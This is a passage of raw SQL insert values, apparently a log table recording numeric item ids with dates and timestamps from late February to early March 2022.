23:03:37'),(45928,1598,1,'2022-02-23','2022-02-23 23:13:50'),(45929,1592,1,'2022-02-23','2022-02-23 23:51:09'),(45930,1602,1,'2022-02-23','2022-02-23 23:57:27'),(45931,3124,1,'2022-02-24','2022-02-24 00:13:05'),(45932,1602,1,'2022-02-24','2022-02-24 00:25:45'),(45933,1612,1,'2022-02-24','2022-02-24 00:42:10'),(45934,1772,1,'2022-02-24','2022-02-24 00:52:52'),(45935,1608,1,'2022-02-24','2022-02-24 01:18:39'),(45936,1582,1,'2022-02-24','2022-02-24 01:29:54'),(45937,1724,1,'2022-02-24','2022-02-24 02:07:06'),(45938,1724,1,'2022-02-24','2022-02-24 02:07:13'),(45939,1724,1,'2022-02-24','2022-02-24 02:07:29'),(45940,108,1,'2022-02-24','2022-02-24 02:35:40'),(45941,1598,1,'2022-02-24','2022-02-24 03:12:11'),(45942,3271,1,'2022-02-24','2022-02-24 03:35:54'),(45943,1602,1,'2022-02-24','2022-02-24 03:49:24'),(45944,1594,1,'2022-02-24','2022-02-24 05:36:30'),(45945,1604,1,'2022-02-24','2022-02-24 06:20:04'),(45946,3030,1,'2022-02-24','2022-02-24 06:27:35'),(45947,1604,1,'2022-02-24','2022-02-24 06:35:13'),(45948,1604,1,'2022-02-24','2022-02-24 06:35:21'),(45949,3313,1,'2022-02-24','2022-02-24 06:50:07'),(45950,1718,1,'2022-02-24','2022-02-24 07:05:04'),(45951,2804,1,'2022-02-24','2022-02-24 07:20:03'),(45952,2309,1,'2022-02-24','2022-02-24 07:35:04'),(45953,1602,1,'2022-02-24','2022-02-24 08:05:04'),(45954,2297,1,'2022-02-24','2022-02-24 08:18:08'),(45955,1614,1,'2022-02-24','2022-02-24 08:18:10'),(45956,1596,1,'2022-02-24','2022-02-24 08:18:22'),(45957,3090,1,'2022-02-24','2022-02-24 08:29:03'),(45958,68,1,'2022-02-24','2022-02-24 08:37:00'),(45959,3313,1,'2022-02-24','2022-02-24 08:53:04'),(45960,4524,1,'2022-02-24','2022-02-24 09:05:04'),(45961,1586,1,'2022-02-24','2022-02-24 09:14:47'),(45962,3038,1,'2022-02-24','2022-02-24 09:17:03'),(45963,1718,1,'2022-02-24','2022-02-24 10:05:04'),(45964,1602,1,'2022-02-24','2022-02-24 10:14:22'),(45965,473,1,'2022-02-24','2022-02-24 10:18:06'),(45966,3107,1,'2022-02-24','2022-02-24 10:18:18'),(45967,2813,1,'2022-02-24','2022-02-24 10:20:10'),(45968,3271,1,'2022-02-24','2022-02-24 10:22:20'),(45969,1614,1,'2022-02-24','2022-02-24 11:17:03'),(45970,2813,1,'2022-02-24','2022-02-24 11:20:10'),(45971,1614,1,'2022-02-24','2022-02-24 11:30:46'),(45972,2751,1,'2022-02-24','2022-02-24 12:05:48'),(45973,2751,1,'2022-02-24','2022-02-24 12:06:04'),(45974,2751,1,'2022-02-24','2022-02-24 12:06:18'),(45975,1728,1,'2022-02-24','2022-02-24 12:07:19'),(45976,2751,1,'2022-02-24','2022-02-24 12:10:50'),(45977,1594,1,'2022-02-24','2022-02-24 12:17:12'),(45978,3253,1,'2022-02-24','2022-02-24 12:20:09'),(45979,2148,1,'2022-02-24','2022-02-24 12:30:17'),(45980,1594,1,'2022-02-24','2022-02-24 12:40:28'),(45981,1722,1,'2022-02-24','2022-02-24 12:56:51'),(45982,1718,1,'2022-02-24','2022-02-24 13:31:38'),(45983,1718,1,'2022-02-24','2022-02-24 13:32:16'),(45984,1718,1,'2022-02-24','2022-02-24 13:32:40'),(45985,1718,1,'2022-02-24','2022-02-24 13:33:07'),(45986,76,1,'2022-02-24','2022-02-24 13:33:23'),(45987,1718,1,'2022-02-24','2022-02-24 13:33:50'),(45988,1718,1,'2022-02-24','2022-02-24 13:37:01'),(45989,3691,1,'2022-02-24','2022-02-24 13:43:45'),(45990,1612,1,'2022-02-24','2022-02-24 14:06:39'),(45991,2309,1,'2022-02-24','2022-02-24 16:19:41'),(45992,2911,1,'2022-02-24','2022-02-24 16:20:27'),(45993,3285,1,'2022-02-24','2022-02-24 16:36:27'),(45994,3287,1,'2022-02-24','2022-02-24 16:36:31'),(45995,3285,1,'2022-02-24','2022-02-24 16:36:41'),(45996,3285,1,'2022-02-24','2022-02-24 16:36:46'),(45997,3287,1,'2022-02-24','2022-02-24 16:37:11'),(45998,3102,1,'2022-02-24','2022-02-24 17:12:43'),(45999,1600,1,'2022-02-24','2022-02-24 17:34:13'),(46000,3030,1,'2022-02-24','2022-02-24 17:39:45'),(46001,68,1,'2022-02-24','2022-02-24 18:30:12'),(46002,1592,1,'2022-02-24','2022-02-24 18:41:23'),(46003,1600,1,'2022-02-24','2022-02-24 19:24:42'),(46004,72,1,'2022-02-24','2022-02-24 21:48:06'),(46005,80,1,'2022-02-24','2022-02-24 22:01:54'),(46006,2159,1,'2022-02-24','2022-02-24 22:02:36'),(46007,1598,1,'2022-02-24','2022-02-24 22:22:15'),(46008,3781,1,'2022-02-24','2022-02-24 22:42:17'),(46009,1720,1,'2022-02-24','2022-02-24 22:52:17'),(46010,1600,1,'2022-02-24','2022-02-24 23:02:17'),(46011,1606,1,'2022-02-24','2022-02-24 23:22:19'),(46012,1586,1,'2022-02-24','2022-02-24 23:46:03'),(46013,1586,1,'2022-02-24','2022-02-24 23:51:04'),(46014,2457,1,'2022-02-25','2022-02-25 00:03:29'),(46015,1877,1,'2022-02-25','2022-02-25 00:10:29'),(46016,1598,1,'2022-02-25','2022-02-25 01:03:33'),(46017,4566,1,'2022-02-25','2022-02-25 03:02:16'),(46018,4520,1,'2022-02-25','2022-02-25 03:02:18'),(46019,4529,1,'2022-02-25','2022-02-25 03:02:20'),(46020,4517,1,'2022-02-25','2022-02-25 03:02:20'),(46021,4514,1,'2022-02-25','2022-02-25 03:02:20'),(46022,4551,1,'2022-02-25','2022-02-25 03:02:21'),(46023,4524,1,'2022-02-25','2022-02-25 03:02:21'),(46024,4454,1,'2022-02-25','2022-02-25 03:02:24'),(46025,4341,1,'2022-02-25','2022-02-25 03:02:31'),(46026,1592,1,'2022-02-25','2022-02-25 03:58:35'),(46027,469,1,'2022-02-25','2022-02-25 04:58:35'),(46028,472,1,'2022-02-25','2022-02-25 05:13:35'),(46029,3090,1,'2022-02-25','2022-02-25 05:28:37'),(46030,72,1,'2022-02-25','2022-02-25 05:33:49'),(46031,3038,1,'2022-02-25','2022-02-25 05:43:38'),(46032,3117,1,'2022-02-25','2022-02-25 05:58:49'),(46033,2297,1,'2022-02-25','2022-02-25 06:15:36'),(46034,1728,1,'2022-02-25','2022-02-25 08:08:43'),(46035,1724,1,'2022-02-25','2022-02-25 08:09:28'),(46036,1728,1,'2022-02-25','2022-02-25 08:09:40'),(46037,1728,1,'2022-02-25','2022-02-25 08:10:08'),(46038,1586,1,'2022-02-25','2022-02-25 08:37:21'),(46039,1600,1,'2022-02-25','2022-02-25 09:13:56'),(46040,1608,1,'2022-02-25','2022-02-25 09:23:09'),(46041,3691,1,'2022-02-25','2022-02-25 09:58:49'),(46042,1724,1,'2022-02-25','2022-02-25 10:06:47'),(46043,1586,1,'2022-02-25','2022-02-25 10:10:42'),(46044,570,1,'2022-02-25','2022-02-25 10:12:23'),(46045,1602,1,'2022-02-25','2022-02-25 10:46:43'),(46046,3069,1,'2022-02-25','2022-02-25 10:56:03'),(46047,3691,1,'2022-02-25','2022-02-25 10:58:37'),(46048,1586,1,'2022-02-25','2022-02-25 11:18:34'),(46049,1877,1,'2022-02-25','2022-02-25 11:22:41'),(46050,3313,1,'2022-02-25','2022-02-25 11:55:31'),(46051,472,1,'2022-02-25','2022-02-25 12:01:35'),(46052,4238,1,'2022-02-25','2022-02-25 12:14:06'),(46053,80,1,'2022-02-25','2022-02-25 12:16:37'),(46054,4514,1,'2022-02-25','2022-02-25 12:31:35'),(46055,4238,1,'2022-02-25','2022-02-25 12:31:57'),(46056,72,1,'2022-02-25','2022-02-25 12:36:08'),(46057,2748,1,'2022-02-25','2022-02-25 12:46:55'),(46058,1588,1,'2022-02-25','2022-02-25 13:01:50'),(46059,1872,1,'2022-02-25','2022-02-25 13:17:10'),(46060,1877,1,'2022-02-25','2022-02-25 13:46:35'),(46061,1608,1,'2022-02-25','2022-02-25 13:56:58'),(46062,3072,1,'2022-02-25','2022-02-25 13:57:01'),(46063,1594,1,'2022-02-25','2022-02-25 14:25:28'),(46064,84,1,'2022-02-25','2022-02-25 14:32:47'),(46065,1594,1,'2022-02-25','2022-02-25 14:33:35'),(46066,1594,1,'2022-02-25','2022-02-25 14:33:57'),(46067,1600,1,'2022-02-25','2022-02-25 14:35:38'),(46068,1608,1,'2022-02-25','2022-02-25 14:38:34'),(46069,1586,1,'2022-02-25','2022-02-25 14:46:19'),(46070,1544,1,'2022-02-25','2022-02-25 14:50:48'),(46071,3069,1,'2022-02-25','2022-02-25 15:11:05'),(46072,3069,1,'2022-02-25','2022-02-25 15:26:13'),(46073,1872,1,'2022-02-25','2022-02-25 15:41:07'),(46074,570,1,'2022-02-25','2022-02-25 15:42:40'),(46075,3698,1,'2022-02-25','2022-02-25 15:56:58'),(46076,1600,1,'2022-02-25','2022-02-25 15:59:55'),(46077,4582,1,'2022-02-25','2022-02-25 16:37:35'),(46078,2704,1,'2022-02-25','2022-02-25 16:46:39'),(46079,2769,1,'2022-02-25','2022-02-25 17:01:35'),(46080,570,1,'2022-02-25','2022-02-25 17:16:45'),(46081,2617,1,'2022-02-25','2022-02-25 17:24:04'),(46082,2609,1,'2022-02-25','2022-02-25 17:32:17'),(46083,3102,1,'2022-02-25','2022-02-25 17:52:10'),(46084,3764,1,'2022-02-25','2022-02-25 18:16:36'),(46085,470,1,'2022-02-25','2022-02-25 18:26:36'),(46086,467,1,'2022-02-25','2022-02-25 18:36:35'),(46087,1870,1,'2022-02-25','2022-02-25 21:02:35'),(46088,473,1,'2022-02-25','2022-02-25 21:02:54'),(46089,4420,1,'2022-02-25','2022-02-25 21:14:21'),(46090,1588,1,'2022-02-26','2022-02-26 01:08:35'),(46091,1582,1,'2022-02-26','2022-02-26 01:14:42'),(46092,2457,1,'2022-02-26','2022-02-26 01:20:43'),(46093,1612,1,'2022-02-26','2022-02-26 01:26:40'),(46094,1544,1,'2022-02-26','2022-02-26 01:34:19'),(46095,1544,1,'2022-02-26','2022-02-26 01:47:45'),(46096,2410,1,'2022-02-26','2022-02-26 01:56:32'),(46097,1782,1,'2022-02-26','2022-02-26 02:38:32'),(46098,1782,1,'2022-02-26','2022-02-26 03:08:32'),(46099,1594,1,'2022-02-26','2022-02-26 04:06:40'),(46100,1598,1,'2022-02-26','2022-02-26 05:08:36'),(46101,108,1,'2022-02-26','2022-02-26 05:12:36'),(46102,570,1,'2022-02-26','2022-02-26 06:46:34'),(46103,4432,1,'2022-02-26','2022-02-26 06:53:57'),(46104,1604,1,'2022-02-26','2022-02-26 07:16:44'),(46105,4582,1,'2022-02-26','2022-02-26 07:50:27'),(46106,4498,1,'2022-02-26','2022-02-26 08:16:47'),(46107,1602,1,'2022-02-26','2022-02-26 09:08:32'),(46108,2297,1,'2022-02-26','2022-02-26 09:10:33'),(46109,1596,1,'2022-02-26','2022-02-26 09:10:36'),(46110,1604,1,'2022-02-26','2022-02-26 09:48:35'),(46111,1614,1,'2022-02-26','2022-02-26 10:08:35'),(46112,473,1,'2022-02-26','2022-02-26 10:10:35'),(46113,3107,1,'2022-02-26','2022-02-26 10:10:36'),(46114,1596,1,'2022-02-26','2022-02-26 10:11:04'),(46115,2503,1,'2022-02-26','2022-02-26 10:48:32'),(46116,2150,1,'2022-02-26','2022-02-26 11:10:37'),(46117,2411,1,'2022-02-26','2022-02-26 11:10:43'),(46118,4524,1,'2022-02-26','2022-02-26 11:49:17'),(46119,2558,1,'2022-02-26','2022-02-26 11:54:37'),(46120,108,1,'2022-02-26','2022-02-26 11:58:41'),(46121,1610,1,'2022-02-26','2022-02-26 12:16:43'),(46122,68,1,'2022-02-26','2022-02-26 12:18:21'),(46123,2804,1,'2022-02-26','2022-02-26 12:19:14'),(46124,1610,1,'2022-02-26','2022-02-26 12:19:15'),(46125,468,1,'2022-02-26','2022-02-26 12:27:51'),(46126,3316,1,'2022-02-26','2022-02-26 12:34:27'),(46127,72,1,'2022-02-26','2022-02-26 12:35:25'),(46128,487,1,'2022-02-26','2022-02-26 12:44:14'),(46129,2309,1,'2022-02-26','2022-02-26 13:04:23'),(46130,2813,1,'2022-02-26','2022-02-26 13:13:43'),(46131,2609,1,'2022-02-26','2022-02-26 13:34:13'),(46132,1592,1,'2022-02-26','2022-02-26 14:13:42'),(46133,1594,1,'2022-02-26','2022-02-26 14:34:15'),(46134,1606,1,'2022-02-26','2022-02-26 15:04:51'),(46135,4582,1,'2022-02-26','2022-02-26 15:05:17'),(46136,1612,1,'2022-02-26','2022-02-26 15:34:14'),(46137,1602,1,'2022-02-26','2022-02-26 15:47:10'),(46138,2813,1,'2022-02-26','2022-02-26 17:16:51'),(46139,2813,1,'2022-02-26','2022-02-26 17:18:06'),(46140,2309,1,'2022-02-26','2022-02-26 19:14:59'),(46141,4582,1,'2022-02-26','2022-02-26 19:36:19'),(46142,1602,1,'2022-02-26','2022-02-26 20:24:39'),(46143,3764,1,'2022-02-26','2022-02-26 21:44:57'),(46144,1602,1,'2022-02-26','2022-02-26 22:01:26'),(46145,3781,1,'2022-02-26','2022-02-26 22:45:00'),(46146,1877,1,'2022-02-26','2022-02-26 22:55:04'),(46147,473,1,'2022-02-26','2022-02-26 22:55:05'),(46148,2159,1,'2022-02-26','2022-02-26 23:00:59'),(46149,1724,1,'2022-02-26','2022-02-26 23:02:10'),(46150,1724,1,'2022-02-26','2022-02-26 23:02:26'),(46151,1724,1,'2022-02-26','2022-02-26 23:02:32'),(46152,4457,1,'2022-02-26','2022-02-26 23:07:34'),(46153,1598,1,'2022-02-26','2022-02-26 23:41:44'),(46154,2159,1,'2022-02-27','2022-02-27 00:01:04'),(46155,1594,1,'2022-02-27','2022-02-27 01:14:37'),(46156,3781,1,'2022-02-27','2022-02-27 01:34:32'),(46157,3781,1,'2022-02-27','2022-02-27 01:35:57'),(46158,1598,1,'2022-02-27','2022-02-27 01:37:04'),(46159,1606,1,'2022-02-27','2022-02-27 01:44:00'),(46160,1600,1,'2022-02-27','2022-02-27 01:54:04'),(46161,80,1,'2022-02-27','2022-02-27 02:06:57'),(46162,2411,1,'2022-02-27','2022-02-27 02:07:14'),(46163,2411,1,'2022-02-27','2022-02-27 02:08:00'),(46164,4485,1,'2022-02-27','2022-02-27 02:14:03'),(46165,1614,1,'2022-02-27','2022-02-27 02:17:36'),(46166,1614,1,'2022-02-27','2022-02-27 03:51:36'),(46167,4529,1,'2022-02-27','2022-02-27 06:31:37'),(46168,3066,1,'2022-02-27','2022-02-27 06:50:41'),(46169,1610,1,'2022-02-27','2022-02-27 07:01:18'),(46170,76,1,'2022-02-27','2022-02-27 07:02:17'),(46171,1598,1,'2022-02-27','2022-02-27 07:59:29'),(46172,2704,1,'2022-02-27','2022-02-27 09:38:45'),(46173,1586,1,'2022-02-27','2022-02-27 10:35:24'),(46174,1586,1,'2022-02-27','2022-02-27 10:44:45'),(46175,1602,1,'2022-02-27','2022-02-27 10:54:36'),(46176,1602,1,'2022-02-27','2022-02-27 10:54:39'),(46177,469,1,'2022-02-27','2022-02-27 11:04:40'),(46178,472,1,'2022-02-27','2022-02-27 11:15:54'),(46179,1610,1,'2022-02-27','2022-02-27 11:25:57'),(46180,1600,1,'2022-02-27','2022-02-27 11:44:19'),(46181,469,1,'2022-02-27','2022-02-27 12:14:11'),(46182,1606,1,'2022-02-27','2022-02-27 12:20:17'),(46183,472,1,'2022-02-27','2022-02-27 12:30:38'),(46184,1606,1,'2022-02-27','2022-02-27 12:42:41'),(46185,1877,1,'2022-02-27','2022-02-27 12:54:39'),(46186,72,1,'2022-02-27','2022-02-27 13:06:13'),(46187,1606,1,'2022-02-27','2022-02-27 13:18:42'),(46188,1720,1,'2022-02-27','2022-02-27 13:30:40'),(46189,2420,1,'2022-02-27','2022-02-27 13:43:18'),(46190,1586,1,'2022-02-27','2022-02-27 15:03:20'),(46191,3127,1,'2022-02-27','2022-02-27 15:06:41'),(46192,1586,1,'2022-02-27','2022-02-27 15:08:36'),(46193,1588,1,'2022-02-27','2022-02-27 16:06:44'),(46194,68,1,'2022-02-27','2022-02-27 16:24:51'),(46195,1608,1,'2022-02-27','2022-02-27 16:29:34'),(46196,4335,1,'2022-02-27','2022-02-27 17:00:06'),(46197,76,1,'2022-02-27','2022-02-27 17:00:32'),(46198,3691,1,'2022-02-27','2022-02-27 18:24:01'),(46199,1600,1,'2022-02-27','2022-02-27 18:34:01'),(46200,4457,1,'2022-02-27','2022-02-27 18:43:35'),(46201,1610,1,'2022-02-27','2022-02-27 18:48:27'),(46202,76,1,'2022-02-27','2022-02-27 18:48:46'),(46203,1610,1,'2022-02-27','2022-02-27 18:48:54'),(46204,1592,1,'2022-02-27','2022-02-27 18:54:04'),(46205,3691,1,'2022-02-27','2022-02-27 19:14:02'),(46206,3117,1,'2022-02-27','2022-02-27 19:24:43'),(46207,3710,1,'2022-02-27','2022-02-27 19:44:02'),(46208,2457,1,'2022-02-27','2022-02-27 20:04:03'),(46209,4416,1,'2022-02-27','2022-02-27 20:10:47'),(46210,2420,1,'2022-02-27','2022-02-27 20:13:10'),(46211,80,1,'2022-02-27','2022-02-27 20:44:48'),(46212,1582,1,'2022-02-27','2022-02-27 21:03:59'),(46213,2420,1,'2022-02-27','2022-02-27 21:13:02'),(46214,3764,1,'2022-02-27','2022-02-27 21:24:00'),(46215,1600,1,'2022-02-27','2022-02-27 21:28:47'),(46216,467,1,'2022-02-27','2022-02-27 21:44:00'),(46217,1592,1,'2022-02-27','2022-02-27 22:04:00'),(46218,1600,1,'2022-02-27','2022-02-27 22:06:25'),(46219,1600,1,'2022-02-27','2022-02-27 22:13:19'),(46220,3124,1,'2022-02-27','2022-02-27 22:34:00'),(46221,1588,1,'2022-02-27','2022-02-27 23:00:52'),(46222,1594,1,'2022-02-27','2022-02-27 23:06:10'),(46223,2309,1,'2022-02-27','2022-02-27 23:26:41'),(46224,1602,1,'2022-02-27','2022-02-27 23:34:02'),(46225,1602,1,'2022-02-27','2022-02-27 23:34:31'),(46226,1594,1,'2022-02-27','2022-02-27 23:58:57'),(46227,1598,1,'2022-02-28','2022-02-28 01:41:53'),(46228,1582,1,'2022-02-28','2022-02-28 03:05:19'),(46229,4341,1,'2022-02-28','2022-02-28 03:35:32'),(46230,3261,1,'2022-02-28','2022-02-28 04:06:14'),(46231,72,1,'2022-02-28','2022-02-28 04:07:55'),(46232,2410,1,'2022-02-28','2022-02-28 04:35:17'),(46233,2989,1,'2022-02-28','2022-02-28 06:17:20'),(46234,1598,1,'2022-02-28','2022-02-28 06:34:09'),(46235,3069,1,'2022-02-28','2022-02-28 07:04:01'),(46236,4400,1,'2022-02-28','2022-02-28 07:05:03'),(46237,2769,1,'2022-02-28','2022-02-28 07:25:15'),(46238,80,1,'2022-02-28','2022-02-28 07:34:08'),(46239,1600,1,'2022-02-28','2022-02-28 08:02:12'),(46240,2748,1,'2022-02-28','2022-02-28 08:55:54'),(46241,76,1,'2022-02-28','2022-02-28 08:56:23'),(46242,2748,1,'2022-02-28','2022-02-28 08:56:36'),(46243,3781,1,'2022-02-28','2022-02-28 08:59:55'),(46244,4457,1,'2022-02-28','2022-02-28 09:00:11'),(46245,1586,1,'2022-02-28','2022-02-28 09:21:23'),(46246,1596,1,'2022-02-28','2022-02-28 10:17:37'),(46247,2297,1,'2022-02-28','2022-02-28 10:17:42'),(46248,4454,1,'2022-02-28','2022-02-28 10:44:41'),(46249,80,1,'2022-02-28','2022-02-28 11:02:22'),(46250,68,1,'2022-02-28','2022-02-28 11:02:26'),(46251,4582,1,'2022-02-28','2022-02-28 11:02:30'),(46252,108,1,'2022-02-28','2022-02-28 11:02:33'),(46253,2297,1,'2022-02-28','2022-02-28 11:17:45'),(46254,473,1,'2022-02-28','2022-02-28 12:17:45'),(46255,1602,1,'2022-02-28','2022-02-28 12:53:36'),(46256,1600,1,'2022-02-28','2022-02-28 12:55:54'),(46257,2804,1,'2022-02-28','2022-02-28 13:23:39'),(46258,1608,1,'2022-02-28','2022-02-28 14:04:10'),(46259,2813,1,'2022-02-28','2022-02-28 14:08:01'),(46260,2410,1,'2022-02-28','2022-02-28 14:34:39'),(46261,1588,1,'2022-02-28','2022-02-28 14:51:26'),(46262,2309,1,'2022-02-28','2022-02-28 14:53:41'),(46263,3282,1,'2022-02-28','2022-02-28 14:57:17'),(46264,3253,1,'2022-02-28','2022-02-28 14:58:40'),(46265,3006,1,'2022-02-28','2022-02-28 15:04:02'),(46266,3316,1,'2022-02-28','2022-02-28 15:11:46'),(46267,80,1,'2022-02-28','2022-02-28 15:18:26'),(46268,4341,1,'2022-02-28','2022-02-28 15:32:29'),(46269,89,1,'2022-02-28','2022-02-28 15:36:42'),(46270,1606,1,'2022-02-28','2022-02-28 15:37:32'),(46271,4412,1,'2022-02-28','2022-02-28 15:50:40'),(46272,467,1,'2022-02-28','2022-02-28 15:53:41'),(46273,1592,1,'2022-02-28','2022-02-28 17:15:32'),(46274,2159,1,'2022-02-28','2022-02-28 17:20:34'),(46275,2159,1,'2022-02-28','2022-02-28 17:21:51'),(46276,2159,1,'2022-02-28','2022-02-28 17:22:18'),(46277,1701,1,'2022-02-28','2022-02-28 18:03:36'),(46278,1701,1,'2022-02-28','2022-02-28 18:04:22'),(46279,1701,1,'2022-02-28','2022-02-28 18:04:29'),(46280,84,1,'2022-02-28','2022-02-28 18:05:23'),(46281,3664,1,'2022-02-28','2022-02-28 18:07:51'),(46282,84,1,'2022-02-28','2022-02-28 18:08:06'),(46283,1877,1,'2022-02-28','2022-02-28 18:08:12'),(46284,84,1,'2022-02-28','2022-02-28 18:08:29'),(46285,1872,1,'2022-02-28','2022-02-28 18:08:34'),(46286,84,1,'2022-02-28','2022-02-28 18:08:48'),(46287,91,1,'2022-02-28','2022-02-28 18:09:15'),(46288,1604,1,'2022-02-28','2022-02-28 18:34:05'),(46289,1594,1,'2022-02-28','2022-02-28 18:40:26'),(46290,1604,1,'2022-02-28','2022-02-28 18:47:17'),(46291,1594,1,'2022-02-28','2022-02-28 19:00:24'),(46292,3710,1,'2022-02-28','2022-02-28 19:33:44'),(46293,1612,1,'2022-02-28','2022-02-28 20:31:17'),(46294,1600,1,'2022-02-28','2022-02-28 20:34:53'),(46295,2309,1,'2022-02-28','2022-02-28 21:01:17'),(46296,1600,1,'2022-02-28','2022-02-28 21:13:12'),(46297,1600,1,'2022-02-28','2022-02-28 21:14:09'),(46298,470,1,'2022-02-28','2022-02-28 21:34:44'),(46299,2457,1,'2022-02-28','2022-02-28 21:53:56'),(46300,1612,1,'2022-02-28','2022-02-28 22:15:49'),(46301,3781,1,'2022-02-28','2022-02-28 22:33:44'),(46302,80,1,'2022-02-28','2022-02-28 22:52:56'),(46303,1614,1,'2022-02-28','2022-02-28 22:54:45'),(46304,470,1,'2022-02-28','2022-02-28 23:14:59'),(46305,4524,1,'2022-02-28','2022-02-28 23:43:44'),(46306,3226,1,'2022-02-28','2022-02-28 23:43:47'),(46307,468,1,'2022-02-28','2022-02-28 23:53:45'),(46308,2503,1,'2022-03-01','2022-03-01 00:05:07'),(46309,4514,1,'2022-03-01','2022-03-01 00:33:43'),(46310,3764,1,'2022-03-01','2022-03-01 01:03:45'),(46311,1598,1,'2022-03-01','2022-03-01 01:13:45'),(46312,2748,1,'2022-03-01','2022-03-01 01:23:45'),(46313,468,1,'2022-03-01','2022-03-01 01:33:45'),(46314,2159,1,'2022-03-01','2022-03-01 01:39:33'),(46315,3107,1,'2022-03-01','2022-03-01 01:52:00'),(46316,4335,1,'2022-03-01','2022-03-01 02:58:36'),(46317,2159,1,'2022-03-01','2022-03-01 03:09:35'),(46318,1594,1,'2022-03-01','2022-03-01 03:17:38'),(46319,1600,1,'2022-03-01','2022-03-01 04:17:39'),(46320,4485,1,'2022-03-01','2022-03-01 04:17:41'),(46321,72,1,'2022-03-01','2022-03-01 04:54:03'),(46322,3030,1,'2022-03-01','2022-03-01 05:17:37'),(46323,4485,1,'2022-03-01','2022-03-01 05:17:41'),(46324,1718,1,'2022-03-01','2022-03-01 05:39:43'),(46325,1588,1,'2022-03-01','2022-03-01 07:36:07'),(46326,2769,1,'2022-03-01','2022-03-01 07:55:37'),(46327,91,1,'2022-03-01','2022-03-01 08:20:59'),(46328,3781,1,'2022-03-01','2022-03-01 08:23:24'),(46329,1592,1,'2022-03-01','2022-03-01 08:53:29'),(46330,3287,1,'2022-03-01','2022-03-01 08:59:17'),(46331,2769,1,'2022-03-01','2022-03-01 09:33:42'),(46332,1614,1,'2022-03-01','2022-03-01 09:44:56'),(46333,1877,1,'2022-03-01','2022-03-01 09:49:30'),(46334,3069,1,'2022-03-01','2022-03-01 09:56:23'),(46335,3030,1,'2022-03-01','2022-03-01 10:04:46'),(46336,80,1,'2022-03-01','2022-03-01 10:09:00'),(46337,2411,1,'2022-03-01','2022-03-01 10:09:14'),(46338,1749,1,'2022-03-01','2022-03-01 10:11:42'),(46339,3030,1,'2022-03-01','2022-03-01 10:21:55'),(46340,3764,1,'2022-03-01','2022-03-01 10:33:57'),(46341,1872,1,'2022-03-01','2022-03-01 11:05:31'),(46342,1602,1,'2022-03-01','2022-03-01 11:13:24'),(46343,3269,1,'2022-03-01','2022-03-01 11:22:15'),(46344,1602,1,'2022-03-01','2022-03-01 11:39:16'),(46345,1612,1,'2022-03-01','2022-03-01 12:40:02'),(46346,68,1,'2022-03-01','2022-03-01 12:40:59'),(46347,80,1,'2022-03-01','2022-03-01 12:48:27'),(46348,3781,1,'2022-03-01','2022-03-01 13:58:39'),(46349,1602,1,'2022-03-01','2022-03-01 14:10:03'),(46350,1720,1,'2022-03-01','2022-03-01 15:07:21'),(46351,1720,1,'2022-03-01','2022-03-01 15:07:44'),(46352,1720,1,'2022-03-01','2022-03-01 15:08:10'),(46353,1720,1,'2022-03-01','2022-03-01 15:09:17'),(46354,1720,1,'2022-03-01','2022-03-01 15:09:39'),(46355,1720,1,'2022-03-01','2022-03-01 15:11:47'),(46356,1720,1,'2022-03-01','2022-03-01 15:12:09'),(46357,1720,1,'2022-03-01','2022-03-01 15:12:14'),(46358,1720,1,'2022-03-01','2022-03-01 15:12:19'),(46359,1720,1,'2022-03-01','2022-03-01 15:12:27'),(46360,1720,1,'2022-03-01','2022-03-01 15:12:44'),(46361,1720,1,'2022-03-01','2022-03-01 15:12:48'),(46362,1720,1,'2022-03-01','2022-03-01 15:12:56'),(46363,4404,1,'2022-03-01','2022-03-01 15:13:34'),(46364,1720,1,'2022-03-01','2022-03-01 15:14:25'),(46365,1596,1,'2022-03-01','2022-03-01 15:49:46'),(46366,1586,1,'2022-03-01','2022-03-01 15:52:29'),(46367,469,1,'2022-03-01','2022-03-01 15:57:28'),(46368,472,1,'2022-03-01','2022-03-01 16:04:41'),(46369,1606,1,'2022-03-01','2022-03-01 16:10:39'),(46370,4494,1,'2022-03-01','2022-03-01 16:23:28'),(46371,4457,1,'2022-03-01','2022-03-01 17:09:06'),(46372,76,1,'2022-03-01','2022-03-01 17:10:25'),(46373,4457,1,'2022-03-01','2022-03-01 17:10:31'),(46374,3438,1,'2022-03-01','2022-03-01 17:43:44'),(46375,1586,1,'2022-03-01','2022-03-01 17:44:24'),(46376,3282,1,'2022-03-01','2022-03-01 18:04:19'),(46377,1610,1,'2022-03-01','2022-03-01 18:27:19'),(46378,1602,1,'2022-03-01','2022-03-01 18:51:54'),(46379,1586,1,'2022-03-01','2022-03-01 19:00:58'),(46380,1586,1,'2022-03-01','2022-03-01 19:05:43'),(46381,469,1,'2022-03-01','2022-03-01 19:43:15'),(46382,472,1,'2022-03-01','2022-03-01 19:45:50'),(46383,3691,1,'2022-03-01','2022-03-01 19:50:33'),(46384,1720,1,'2022-03-01','2022-03-01 20:01:17'),(46385,1586,1,'2022-03-01','2022-03-01 20:10:48'),(46386,2297,1,'2022-03-01','2022-03-01 20:12:33'),(46387,1608,1,'2022-03-01','2022-03-01 20:12:53'),(46388,1586,1,'2022-03-01','2022-03-01 20:13:49'),(46389,2769,1,'2022-03-01','2022-03-01 20:13:56'),(46390,2420,1,'2022-03-01','2022-03-01 20:16:40'),(46391,1720,1,'2022-03-01','2022-03-01 20:22:54'),(46392,1586,1,'2022-03-01','2022-03-01 20:38:57'),(46393,3127,1,'2022-03-01','2022-03-01 20:43:18'),(46394,1877,1,'2022-03-01','2022-03-01 20:53:51'),(46395,3102,1,'2022-03-01','2022-03-01 20:57:46'),(46396,2150,1,'2022-03-01','2022-03-01 21:00:09'),(46397,1600,1,'2022-03-01','2022-03-01 21:01:19'),(46398,1614,1,'2022-03-01','2022-03-01 21:17:10'),(46399,1612,1,'2022-03-01','2022-03-01 21:20:19'),(46400,4566,1,'2022-03-01','2022-03-01 21:22:17'),(46401,80,1,'2022-03-01','2022-03-01 21:51:44'),(46402,1612,1,'2022-03-01','2022-03-01 21:54:07'),(46403,4494,1,'2022-03-01','2022-03-01 21:55:52'),(46404,3764,1,'2022-03-01','2022-03-01 22:42:36'),(46405,1582,1,'2022-03-01','2022-03-01 22:49:27'),(46406,3698,1,'2022-03-01','2022-03-01 22:51:27'),(46407,473,1,'2022-03-01','2022-03-01 23:17:12'),(46408,467,1,'2022-03-01','2022-03-01 23:34:02'),(46409,3041,1,'2022-03-02','2022-03-02 00:02:52'),(46410,3038,1,'2022-03-02','2022-03-02 00:03:49'),(46411,4428,1,'2022-03-02','2022-03-02 00:06:03'),(46412,3710,1,'2022-03-02','2022-03-02 01:03:39'),(46413,1602,1,'2022-03-02','2022-03-02 